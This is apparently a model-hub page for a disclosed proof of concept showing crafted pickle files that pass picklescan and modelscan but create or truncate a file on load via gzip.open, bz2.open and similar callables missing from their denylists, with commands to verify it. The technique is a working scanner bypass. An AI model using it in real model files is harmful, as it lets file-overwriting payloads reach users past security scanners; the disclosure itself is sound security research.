Pickle Scanner Bypass β€” arbitrary file creation/truncation via unblocked file-open callables (security PoC)

Benign huntr MFV research PoC. A model passes picklescan 1.0.4 and modelscan 0.8.8 as clean, yet on load creates/truncates an attacker path via a write-mode file-open callable that is missing from both denylists: gzip.open, bz2.open, lzma.open, wave.open, mailbox.mbox.

  • model.pkl / model.pt β€” primary PoC (gzip.open) creating /tmp/huntr_poc_file_write_family
  • member_<name>.pkl β€” one file per family member for independent verification
pip install picklescan modelscan torch
python -c "from picklescan.scanner import scan_file_path as s; print(s('model.pkl').infected_files)"  # 0
modelscan -p model.pkl   # No issues found!
rm -f /tmp/huntr_poc_file_write_family
python -c "import pickle; pickle.load(open('model.pkl','rb'))"; ls -l /tmp/huntr_poc_file_write_family

Reported by hacnho. Payload only creates a benign marker file.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support